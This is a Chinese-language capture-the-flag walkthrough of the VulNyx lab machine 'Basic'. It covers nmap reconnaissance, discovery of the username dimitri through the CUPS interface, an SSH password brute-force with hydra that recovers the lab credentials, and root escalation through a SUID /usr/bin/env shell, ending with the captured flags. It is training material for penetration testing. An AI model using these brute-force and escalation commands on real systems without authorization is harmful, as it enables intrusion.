Vlx_Basic

靶机来源：https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-22 09:18 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00052s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00043s latency).
MAC Address: 08:00:27:36:61:3D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.55
Host is up (0.0015s latency).
MAC Address: 08:00:27:49:88:F7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.55 seconds

靶机IP：192.168.2.55

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.55                         
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-22 09:19 +0800
Nmap scan report for 192.168.2.55
Host is up (0.00027s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
631/tcp open  ipp
MAC Address: 08:00:27:49:88:F7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds

开放端口：22、80、631

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,631 192.168.2.55
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-22 09:19 +0800
Nmap scan report for 192.168.2.55
Host is up (0.0016s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Test Debian Default Page: It works
631/tcp open  ipp     CUPS 2.3
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: CUPS/2.3 IPP/2.1
|_http-title: Inicio - CUPS 2.3.3op2
MAC Address: 08:00:27:49:88:F7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.55                        
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-22 09:20 +0800
Nmap scan report for 192.168.2.55
Host is up (0.0011s latency).
Not shown: 97 closed udp ports (port-unreach)
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
631/udp  open|filtered ipp
5353/udp open          zeroconf
MAC Address: 08:00:27:49:88:F7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 107.41 seconds

二、WEB渗透

1、80网站

访问80端口，是Apache的默认页面

2、631-IPP

**互联网打印协议 (IPP)**，如 RFC 2910 和 RFC 2911 中所规定，是网络打印的事实标准。它基于 HTTP/1.1（无论是明文还是 TLS）并提供了丰富的 API，用于创建打印作业、查询打印机功能和管理队列。现代扩展如 IPP Everywhere 甚至允许在移动和云环境中进行无驱动打印，同时相同的数据包格式也被用于 3D 打印机。

访问631端口

找到一个用户名dimitri

三、获取dimitri权限

使用hydra进行爆破用户dimitri的SSH密码

┌──(root㉿kali)-[~/miaosec]
└─# hydra -t 64 -l dimitri  -P /usr/share/wordlists/rockyou.txt ssh://192.168.2.55 -F -I 
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-22 09:48:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.2.55:22/
[STATUS] 440.00 tries/min, 440 tries in 00:01h, 14343985 to do in 543:20h, 38 active
[22][ssh] host: 192.168.2.55   login: dimitri   password: mememe
[STATUS] attack finished for 192.168.2.55 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-22 09:50:42

成功获取到SSH的登录凭证：dimitri:mememe

获取到dimitri权限

┌──(root㉿kali)-[~/miaosec]
└─# ssh dimitri@192.168.2.55 
The authenticity of host '192.168.2.55 (192.168.2.55)' can't be established.
ED25519 key fingerprint is: SHA256:3dqq7f/jDEeGxYQnF2zHbpzEtjjY49/5PvV5/4MMqns
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:9: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.55' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
dimitri@192.168.2.55's password: 
dimitri@basic:~$ id
uid=1000(dimitri) gid=1000(dimitri) grupos=1000(dimitri)

四、权限提升

查看suid文件

dimitri@basic:/tmp$ find / -type f -perm -4000 2>/dev/null
/usr/bin/env
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/libexec/polkit-agent-helper-1

发现/usr/bin/env存在suid权限，直接进行利用即可

dimitri@basic:/tmp$ /usr/bin/env /bin/sh -p
# id
uid=1000(dimitri) gid=1000(dimitri) euid=0(root) grupos=1000(dimitri)

五、查看FLAG

# cat /root/root.txt /home/dimitri/user.txt
551df067bd06f13f1c092743493de034
f17d2f67c468d15600d8fc0b2ebc1d8c